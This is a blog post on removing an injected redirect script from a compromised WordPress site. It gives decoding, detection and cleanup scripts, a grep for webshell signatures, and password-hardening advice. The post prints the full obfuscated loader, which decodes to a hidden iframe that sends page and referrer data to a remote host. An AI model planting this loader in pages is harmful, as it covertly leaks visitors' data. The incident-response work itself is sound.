Recently the site had a large amount of redirect code injected, like this:
<script type="text/javascript">var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00a33l6,'00'02)'02'00k,vg'00'02)'02'00cq'00'02)'02'00gpe'00'02)'02'00wkf'00'02)'02'00g,a'00'02)'02'00mo'00'02)'02'00-qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>

The loader is small: every character of the string a is XORed with 2, which yields a %XX-escaped string, unescape() turns that into the real script, and document.write() injects it into the page. This was the first time I had seen this style. Replacing it directly with sed would need a lot of escaping, and it had been inserted into many different files at different line numbers, so I gave up on the sed approach.
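To see what the injected loader does without running it in a browser, here is an added Python example (not part of the original post) that reverses the obfuscation the same way the loader itself does, XOR every character with 2 and then unescape, and then reports the DOM sources and sinks the decoded script touches and rebuilds the iframe URL template from its concatenated string fragments. The string literal is the blob from the page; the function and constant names (decode_xor2_unescape, summarize, SINKS) and the list of sinks to flag are my own.

```python
import re
from urllib.parse import unquote

# The obfuscated string from the injected <script> on this page, split across
# literals only so it fits on screen (the characters are unchanged).
BLOB = (
    "'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02"
    "glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02"
    "glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02"
    "glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02"
    "fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;"
    "kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02"
    "'00a33l6,'00'02)'02'00k,vg'00'02)'02'00cq'00'02)'02'00gpe'00'02)'02'00wkf'00'02)'02"
    "'00g,a'00'02)'02'00mo'00'02)'02'00-qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02"
    "'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02"
    "'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02"
    "'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;"
    "fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G"
)

# DOM sources and sinks worth flagging in a decoded loader (my own list, not from the page).
SINKS = ("document.write", "createElement", "appendChild", "iframe.src",
         "document.referrer", "document.title", "location.host")


def decode_xor2_unescape(blob: str, key: int = 2) -> str:
    """Reverse the loader's own decode step: XOR each character with `key`,
    which yields a %XX-escaped string, then apply unescape() (urllib's unquote)."""
    xored = "".join(chr(ord(ch) ^ key) for ch in blob)
    return unquote(xored)


def summarize(decoded: str) -> dict:
    """Report which sources/sinks the decoded script touches and rebuild the
    iframe.src template from its concatenated string fragments; variables
    that are concatenated in are kept as {name} placeholders."""
    found = [s for s in SINKS if s in decoded]
    template = ""
    m = re.search(r"iframe\.src=\s*(.*?);", decoded, re.S)
    if m:
        # quoted fragments are joined as-is, bare identifiers become {name}
        parts = re.findall(r'"([^"]*)"|([A-Za-z_]\w*)', m.group(1))
        template = "".join(lit if lit else "{" + name + "}" for lit, name in parts)
    return {"sinks": found, "iframe_src": template}


DECODED = decode_xor2_unescape(BLOB)

if __name__ == "__main__":
    print(DECODED)
    print(summarize(DECODED))
```

Running it prints the decoded script: it creates a 0x0 iframe whose src carries document.title, document.referrer and location.host to a remote host as query parameters, and appends it to the body. The XOR key is a parameter of decode_xor2_unescape because other copies of this loader family differ only in that constant.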
Since the code had been modified, a backdoor must have been uploaded, so look for the backdoor first:
find /var/www/ -type f -print0 | xargs -0 egrep 'phpspy|c99sh|milw0rm|eval\(gzuncompress|eval\(base64_decode|spider_bc' > /tmp/phpm.txt

(-type f keeps directories out of xargs, -print0/-0 survives odd file names, and the parentheses are escaped because egrep treats bare ones as grouping.) Once the backdoor is found, delete it, and change the database password and the site login password at the same time.
Use grep to find the files that have the code inserted. The search string is the XOR-obfuscated form of text/javascript, which every copy of the loader contains, so it is a reliable marker:
grep -rnI --exclude-dir=proc --exclude-dir=sys --exclude-dir=dev "00vgzv-hctcqapkrv" / > result.txt

(-I skips binary files, and the exclusions keep grep out of /proc, /sys and /dev, which it would otherwise descend into when started from /.) Then use PHP to process the results in result.txt:
<?php
ignore_user_abort(true);
set_time_limit(0);

// result.txt holds "grep -rn" output: one "path:line:content" record per line
$lines = file('result.txt', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
$ss = array();
foreach ($lines as $k) {
    $s = explode(':', $k, 2);   // keep only the path before the first ':'
    $ss[] = $s[0];
}
$ss = array_unique($ss);        // each file once, even if it was hit on several lines
foreach ($ss as $v) {
    echo $v;
    echo "<br>";
}
exit;
?>

This yields the list of file names that need changing; a PHP regex replacement does the rest:
<?php
// one path per entry; the list comes from the previous script's output
$files = array();
$files[] = "/var/www/wp-content/themes/twentyfourteen/header.php";
foreach ($files as $key => $val) {
    $val = trim($val);
    $config = file_get_contents($val);
    // strip the injected block: from '<script type="text/javascript">var a=' to the next '</script>'
    $con = preg_replace("/<script type=\"text\/javascript\">var a=(.*?)<\/script>/is", "", $config);
    if ($con !== null && $con !== $config) {   // only rewrite files that actually changed
        @file_put_contents($val, $con);
    }
}
exit('ok');
?>
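The two PHP scripts above do the list-and-replace in two passes. As an added example, not from the original post, here is the same workflow as one Python script: it parses the grep -rn output record by record (path:line:content, skipping grep's "Binary file ... matches" notices), deduplicates the paths, removes the block with the same pattern as the page's preg_replace, and defaults to a dry run that only counts hits, writing a .bak copy before any file is changed. The grep output and the infected page inside it are constructed samples; the function names are my own.

```python
import re
import shutil

# The removal pattern mirrors the page's preg_replace: everything from the
# injected '<script type="text/javascript">var a=' up to the next '</script>'.
INJECT_RE = re.compile(r'<script type="text/javascript">var a=.*?</script>', re.S | re.I)

# Constructed sample of `grep -rn` output (not output from the page's server).
SAMPLE_GREP = "\n".join([
    "/var/www/html/index.php:3:<script type=\"text/javascript\">var a=\"'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv...",
    "/var/www/html/index.php:41:<script type=\"text/javascript\">var a=\"'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv...",
    "Binary file /var/www/html/wp-content/uploads/cache.bin matches",
    "/var/www/html/wp-content/themes/twentyfourteen/header.php:1:<script type=\"text/javascript\">var a=\"'1Aqapkrv...",
])

# Constructed infected page (the loader body is truncated; only its shape matters here).
SAMPLE_PAGE = (
    '<html><head>'
    '<script type="text/javascript">var a="\'1Aqapkrv\'02v{rg...";b="";'
    'document.write(unescape(b));</script>'
    '<title>ok</title></head></html>'
)


def unique_paths_from_grep(grep_output: str) -> list:
    """Turn `grep -rn` output ("path:line:content" per line) into the distinct
    file paths in first-seen order. "Binary file ... matches" lines are skipped
    because they carry no path:line prefix."""
    paths = []
    for line in grep_output.splitlines():
        if not line or line.startswith("Binary file "):
            continue
        path = line.split(":", 1)[0]
        if path not in paths:
            paths.append(path)
    return paths


def strip_injection(text: str):
    """Return (cleaned_text, blocks_removed)."""
    return INJECT_RE.subn("", text)


def clean_file(path: str, write: bool = False) -> int:
    """Count (and, with write=True, remove) injected blocks in one file.
    A '.bak' copy is made before the file is rewritten."""
    with open(path, encoding="utf-8", errors="surrogateescape") as f:
        original = f.read()
    cleaned, n = strip_injection(original)
    if n and write:
        shutil.copy2(path, path + ".bak")
        with open(path, "w", encoding="utf-8", errors="surrogateescape") as f:
            f.write(cleaned)
    return n


if __name__ == "__main__":
    import sys
    # usage: python clean.py result.txt [--write]   (dry run unless --write is given)
    with open(sys.argv[1], encoding="utf-8", errors="replace") as f:
        for p in unique_paths_from_grep(f.read()):
            print(p, clean_file(p, write="--write" in sys.argv))
```

The pattern, like the page's, matches any block that starts with <script type="text/javascript">var a=, so a legitimate script that happens to start that way would be removed too; that is why the script reports counts per file first and only rewrites with --write.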
Because this is a WordPress site, once the backdoor and the malicious code were removed the admin login was hammered with password guessing, so batch-find the login files and rename them. Note that WordPress core refers to wp-login.php by name (login and logout URLs, the redirect from wp-admin), so a renamed file needs a rewrite rule or a plugin that updates those references, otherwise logging in breaks.
find /var/www/ -name 'wp-login.php' > file.txt

And with that, job done.
There are probably better ways to handle this; this is a roundabout approach, offered for reference.